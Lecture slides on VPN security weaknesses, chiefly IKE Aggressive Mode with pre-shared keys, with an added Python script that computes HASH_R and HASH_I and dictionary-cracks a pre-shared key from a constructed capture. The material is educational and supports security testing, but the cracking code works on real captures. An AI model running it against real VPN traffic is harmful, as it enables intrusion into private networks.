VPN AND SECURITY FLAWS
Rajesh Perumal
Clemson University
VPN – AN ATTRACTIVE TARGET
VPNs carry sensitive information.
A compromised remote access VPN exposes the entire internal network, not a single server.
Network intrusion detection systems cannot inspect VPN traffic while it is still encrypted.
Hardening of Internet-facing servers makes the VPN a tempting target.
VPN FLAWS
Insecure storage of authentication credentials by VPN clients
Username enumeration vulnerabilities
Offline password cracking
Man in the middle attacks
Lack of account lockout
Poor default configurations
Poor guidance and documentation
Insecure storage of authentication credentials by VPN clients
Storing the username unencrypted in a file or the registry
Storing the password in scrambled or obfuscated form, which is not encryption and is easily reversed
Physical memory dumps can reveal plaintext passwords, since the client must hold the cleartext password to authenticate
Caching credentials so that the user is not prompted again
Username Enumeration Vulnerabilities
With IKE Aggressive Mode and PSK authentication, the server's response to the first packet differs depending on whether the ID it carries (the username or group name) is valid. This tells the attacker when a login name is incorrect, so the correct usernames can be deduced by guessing.
Offline Password Cracking
The hash value is easy to obtain: in Aggressive Mode the responder's hash (HASH_R) is sent unencrypted in the second packet, and every other input to it (nonces, Diffie-Hellman public values, cookies, SA and ID payloads) is also in the clear.
A dictionary attack on the pre-shared key then recovers a weak password in a feasible amount of time, with no further contact with the server, so account lockout (where it exists) does not help.
Man in the Middle Attacks
By placing a packet sniffing system between the VPN client and server, an attacker can read the cleartext user (or group) names, and the password can be cracked offline from the 1st and 2nd packets of the IKE Aggressive Mode exchange.
The sniffing system (SS) acts as a server for the client and as a client for the server. The SS receives the client's ISAKMP messages, including its user name and the hash computed from the password, and issues its own ISAKMP messages to the client. Once the user name is known and the password has been cracked, the SS can likewise send its own ISAKMP messages to the real server and authenticate as that user.
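The following is an added example, not part of the original slides, covering both the offline cracking slide and the man in the middle slide above. It implements the RFC 2409 section 5.4 formulas for SKEYID, HASH_R and HASH_I under PSK authentication (the same computation ike-scan's psk-crack performs) and runs a dictionary attack against a constructed capture. Assumptions: SHA-1 is the negotiated hash, the Diffie-Hellman values and SA body are arbitrary filler bytes (only their wire bytes enter the hash), and the capture, weak PSK "vpn123" and wordlist are all made up here so the attack has something to recover. A passive sniffer cracks HASH_R from message 2; a rogue responder (the "sniffing system" that answers the client itself) cracks HASH_I from message 3 in exactly the same way.

```python
"""IKE Phase 1 Aggressive Mode with PSK: offline recovery of the pre-shared key
from HASH_R (passive sniffing) or HASH_I (rogue responder), per RFC 2409 5.4.

Added example, not code from the original slides. The capture below is
constructed: its hashes are generated with a weak PSK so there is something
to recover. Assumes SHA-1 as the negotiated hash.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Callable, Iterable, Optional


@dataclass
class AggressiveModeCapture:
    """Everything the attack needs; all of it is sent unencrypted in messages 1-3."""
    g_xi: bytes    # initiator DH public value (KE payload, message 1)
    g_xr: bytes    # responder DH public value (KE payload, message 2)
    cky_i: bytes   # initiator cookie, ISAKMP header (8 bytes)
    cky_r: bytes   # responder cookie, ISAKMP header (8 bytes)
    sai_b: bytes   # body of the initiator's SA payload (message 1)
    idii_b: bytes  # body of the initiator's ID payload (message 1): username/group, in clear
    idir_b: bytes  # body of the responder's ID payload (message 2)
    ni_b: bytes    # initiator nonce (message 1)
    nr_b: bytes    # responder nonce (message 2)
    hash_r: bytes = b""  # HASH_R from message 2 (what a passive sniffer sees)
    hash_i: bytes = b""  # HASH_I from message 3 (what a rogue responder receives)


def skeyid(psk: bytes, cap: AggressiveModeCapture, digest: Callable) -> bytes:
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b); prf is HMAC with the negotiated hash."""
    return hmac.new(psk, cap.ni_b + cap.nr_b, digest).digest()


def hash_r(psk: bytes, cap: AggressiveModeCapture, digest: Callable = hashlib.sha1) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    msg = cap.g_xr + cap.g_xi + cap.cky_r + cap.cky_i + cap.sai_b + cap.idir_b
    return hmac.new(skeyid(psk, cap, digest), msg, digest).digest()


def hash_i(psk: bytes, cap: AggressiveModeCapture, digest: Callable = hashlib.sha1) -> bytes:
    """HASH_I = prf(SKEYID, g^xi | g^xr | CKY-I | CKY-R | SAi_b | IDii_b)."""
    msg = cap.g_xi + cap.g_xr + cap.cky_i + cap.cky_r + cap.sai_b + cap.idii_b
    return hmac.new(skeyid(psk, cap, digest), msg, digest).digest()


def crack_psk(cap: AggressiveModeCapture, wordlist: Iterable[str],
              use_hash_i: bool = False, digest: Callable = hashlib.sha1) -> Optional[str]:
    """Dictionary attack: recompute the hash for each candidate PSK and compare.
    Entirely offline, so no account lockout on the VPN server can interfere."""
    compute, target = (hash_i, cap.hash_i) if use_hash_i else (hash_r, cap.hash_r)
    for word in wordlist:
        if hmac.compare_digest(compute(word.encode(), cap, digest), target):
            return word
    return None


def id_payload_body(id_type: int, data: bytes) -> bytes:
    """ID payload body: type(1) | protocol(1) | port(2) | identification data."""
    return bytes([id_type, 0, 0, 0]) + data


def make_constructed_capture(psk: bytes, username: bytes = b"vpngroup") -> AggressiveModeCapture:
    """Constructed capture (not a real exchange) whose hashes were made with `psk`."""
    cap = AggressiveModeCapture(
        g_xi=bytes([0x11]) * 128,  # filler standing in for a 1024-bit DH public value
        g_xr=bytes([0x22]) * 128,
        cky_i=bytes.fromhex("0123456789abcdef"),
        cky_r=bytes.fromhex("fedcba9876543210"),
        sai_b=bytes.fromhex("00000001000000010000002801010001"),  # filler SA body
        idii_b=id_payload_body(3, username),                # ID_USER_FQDN, sent in clear
        idir_b=id_payload_body(1, bytes([192, 0, 2, 1])),   # ID_IPV4_ADDR 192.0.2.1
        ni_b=bytes(range(1, 21)),
        nr_b=bytes(range(101, 121)),
    )
    cap.hash_r = hash_r(psk, cap)
    cap.hash_i = hash_i(psk, cap)
    return cap


# Constructed data: a weak PSK and a small wordlist that happens to contain it.
CAPTURE = make_constructed_capture(b"vpn123")
WORDLIST = ["password", "letmein", "cisco", "Clemson!", "vpn123", "summer2004"]

if __name__ == "__main__":
    # The group/user name needs no cracking at all; it is in message 1 as-is.
    print("IDii (cleartext):", CAPTURE.idii_b[4:].decode())
    print("PSK from HASH_R (passive sniff):", crack_psk(CAPTURE, WORDLIST))
    print("PSK from HASH_I (rogue responder):", crack_psk(CAPTURE, WORDLIST, use_hash_i=True))
```

With a real capture the fields come from the ISAKMP payloads of messages 1 to 3 and the digest from the negotiated hash algorithm (HMAC-MD5 is the other common choice); nothing else changes, which is why a weak pre-shared key is the whole security of an Aggressive Mode PSK deployment.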
Poor Guidance and Documentation
End users are not given proper documentation and are not well enough informed to make sound decisions.
Users therefore go with the default settings and default encryption, whatever those happen to be.
CONCLUSION
90% of remote access VPN systems have had significant security issues.
The cryptographic techniques adopted are strong; the vulnerabilities come from poor configuration.
Well accepted security practices are not followed.
Operating systems take care not to leak whether a username is valid; VPN servers often do not.
Users choose default configurations on the basis of ease of use rather than security, e.g. IKE Aggressive Mode with PSK authentication.
Users do not appreciate how dangerous the bad configuration options are.
Proper testing is needed. Tools like ike-scan (and its companion psk-crack) help test the VPN.